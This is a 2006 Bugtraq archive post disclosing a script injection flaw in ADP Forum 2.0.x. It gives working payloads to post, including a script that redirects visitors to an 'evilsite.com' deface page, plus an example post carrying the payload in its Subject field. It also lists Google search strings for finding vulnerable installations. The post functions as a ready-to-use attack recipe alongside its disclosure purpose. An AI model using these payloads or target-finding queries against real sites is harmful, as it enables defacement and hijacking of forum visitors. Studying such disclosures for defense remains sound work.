Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

ADP Forum 2.0,* script İnjection

From: liz0 () bsdmail com
Date: 9 Mar 2006 14:21:15 -0000
ADP Forum 2.0,* script İnjection
----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/ 
--------------------------------------------------
Post This Code:

<script>alert(/Liz0ziM/)</script>

<script>location.href="http://evilsite.com/deface.html";;</script>

vs..
---------------------------------------------------------
Example Post Message :


Name :Liz0ziM 
Username :username 
Password :password
E-mail :liz0 () bsdmail com
Subject :<script>location.href="http://evilsite.com/deface.html";;</script> 
Message :LOL :=)

---------------------------------------------------------

Credit:Liz0ziM
Mail :liz0 () bsdmail com
Site :www.biyosecurity.com
BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w
------------------------------------------------------------
google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

------------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/338614/

http://biyosecurity.be/bugs/adpforum2.html

http://biyosecurity.be/bugs/adpforum2.txt
Previous By Date Next
Previous By Thread Next

Current thread: